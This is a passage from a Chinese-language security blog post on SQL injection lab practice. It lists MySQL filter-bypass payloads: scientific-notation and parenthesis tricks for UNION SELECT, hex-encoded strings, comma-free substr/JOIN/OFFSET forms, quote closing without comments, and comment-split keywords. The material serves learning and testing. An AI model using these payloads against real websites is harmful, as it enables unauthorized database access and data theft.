<h6 id="3-使用浮点数绕过"><a href="#3-使用浮点数绕过" class="headerlink" title="3.使用浮点数绕过"></a>3.使用浮点数绕过</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">select * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=8E0union select 1,2,3<br>等价<br>select * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=8.0 select 1,2,3<br></code></pre></td></tr></table></figure>

<h6 id="4-使用Tab替代空格"><a href="#4-使用Tab替代空格" class="headerlink" title="4.使用Tab替代空格"></a>4.使用Tab替代空格</h6><h6 id="5-使用两个空格替代一个空格"><a href="#5-使用两个空格替代一个空格" class="headerlink" title="5.使用两个空格替代一个空格"></a>5.使用两个空格替代一个空格</h6><h6 id="6-使用括号绕过"><a href="#6-使用括号绕过" class="headerlink" title="6.使用括号绕过"></a>6.使用括号绕过</h6><p>如果空格被过滤，括号没有被过滤，可以用括号绕过。在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">select(user())from dual <span class="hljs-built_in">where</span>(1=1)and(2=2)<br></code></pre></td></tr></table></figure>

<h6 id="7-过滤引号"><a href="#7-过滤引号" class="headerlink" title="7.过滤引号"></a>7.过滤引号</h6><p>使用16进制绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">select column_name  from information_schema.tables <span class="hljs-built_in">where</span> table_name=<span class="hljs-string">&quot;users&quot;</span><br>等价于<br>select column_name  from information_schema.tables <span class="hljs-built_in">where</span> table_name=0x7573657273<br></code></pre></td></tr></table></figure>

<h6 id="8-过滤逗号"><a href="#8-过滤逗号" class="headerlink" title="8.过滤逗号"></a>8.过滤逗号</h6><p>使用from关键字绕过</p>
<p>对于<code>substr()</code>和<code>mid()</code>这两个方法可以使用<code>from to</code>的方式来解决：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">select substr(database() from 1 <span class="hljs-keyword">for</span> 1);<br>select mid(database() from 1 <span class="hljs-keyword">for</span> 1);<br></code></pre></td></tr></table></figure>

<p>使用join关键字绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">union select 1,2等价于union select * from (select 1)a <span class="hljs-built_in">join</span> (select 2)b<br></code></pre></td></tr></table></figure>

<p>使用like关键字绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">select ascii(mid(user(),1,1))=80   <br>等价<br>select user() like <span class="hljs-string">&#x27;r%&#x27;</span><br></code></pre></td></tr></table></figure>

<p>使用offset关键字绕过</p>
<p>对于limit可以使用offset来绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">select * from news <span class="hljs-built_in">limit</span> 0,1<br>等价于<br>select * from news <span class="hljs-built_in">limit</span> 1 offset 0<br></code></pre></td></tr></table></figure>

<h6 id="9-过滤注释符（-和-）"><a href="#9-过滤注释符（-和-）" class="headerlink" title="9.过滤注释符（ # 和 -- ）"></a>9.过滤注释符（ <code>#</code> 和 <code>--</code> ）</h6><p>手动闭合引号不用注释</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">id</span>=1<span class="hljs-string">&#x27; union select 1,2,3||&#x27;</span>1<br>or<br><span class="hljs-built_in">id</span>=1<span class="hljs-string">&#x27; union select 1,2,&#x27;</span>3<br></code></pre></td></tr></table></figure>

<h6 id="10-过滤比较符号-（-lt-和-gt-）"><a href="#10-过滤比较符号-（-lt-和-gt-）" class="headerlink" title="10.过滤比较符号 （ &lt; 和 &gt; ）"></a>10.过滤比较符号 （ <code>&lt;</code> 和 <code>&gt;</code> ）</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">select * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=1 and ascii(substr(database(),0,1))&gt;64<br><br>between a and b：返回a，b之间的数据，不包含b。<br></code></pre></td></tr></table></figure>

<h6 id="11-过滤等号（-）"><a href="#11-过滤等号（-）" class="headerlink" title="11.过滤等号（ = ）"></a>11.过滤等号（ <code>=</code> ）</h6><p>使用like 、rlike 、regexp 或者 使用&lt; 或者 &gt;</p>
<p>过滤or and xor not使用符号代替</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">and=`&amp;&amp;`  or=`||`   xor=`|`   not=`!`<br></code></pre></td></tr></table></figure>

<p>过滤union，select，where等<br>使用注释符绕过常用注释符：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">// 、--、`/**/`、`<span class="hljs-comment">#`、`--+`、`---`、`;`、`%00`、`--a</span><br></code></pre></td></tr></table></figure>

<p>用法：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">U/**/ NION /**/ SE/**/ LECT /**/user，<span class="hljs-built_in">pwd</span> from user<br></code></pre></td></tr></table></figure>


              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="../../../../../categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-chain-item">漏洞复现</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="../../../../../tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">#漏洞复现</a>
      
        <a href="../../../../../tags/sql%E6%B3%A8%E5%85%A5/">#sql注入</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>sql注入靶场练习</div>
      <div>http://idea-oss.github.io/2024/01/07/sql注入靶场练习/sql注入靶场练习/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>iDea</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年1月7日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="../../../08/sqlmap%E4%BD%BF%E7%94%A8/sqlmap%E4%BD%BF%E7%94%A8/" title="sqlmap使用">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sqlmap使用</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="../../../../../2022/06/20/%E9%80%86%E5%90%91%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B8%89/%E9%80%86%E5%90%91%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B8%89/" title="逆向学习笔记三">
                        <span class="hidden-mobile">逆向学习笔记三</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.4.18/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"0mPxzRPwogk31Fn10hTPyb1K-gzGzoHsz","appKey":"BUzND1EWjf6LGVsgj979UcGb","path":"window.location.pathname","placeholder":"说点什么吧","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":false,"serverURLs":"https://0mpxzrpw.lc-cn-n1-shared.com","emojiCDN":null,"emojiMaps":null,"enableQQ":null},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>可乐</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>不乐</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="../../../../../js/events.js" ></script>
<script  src="../../../../../js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  

  

  

  

  

  

  




  
    <script  src="../../../../../js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="../../../../../js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="../../../../../js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
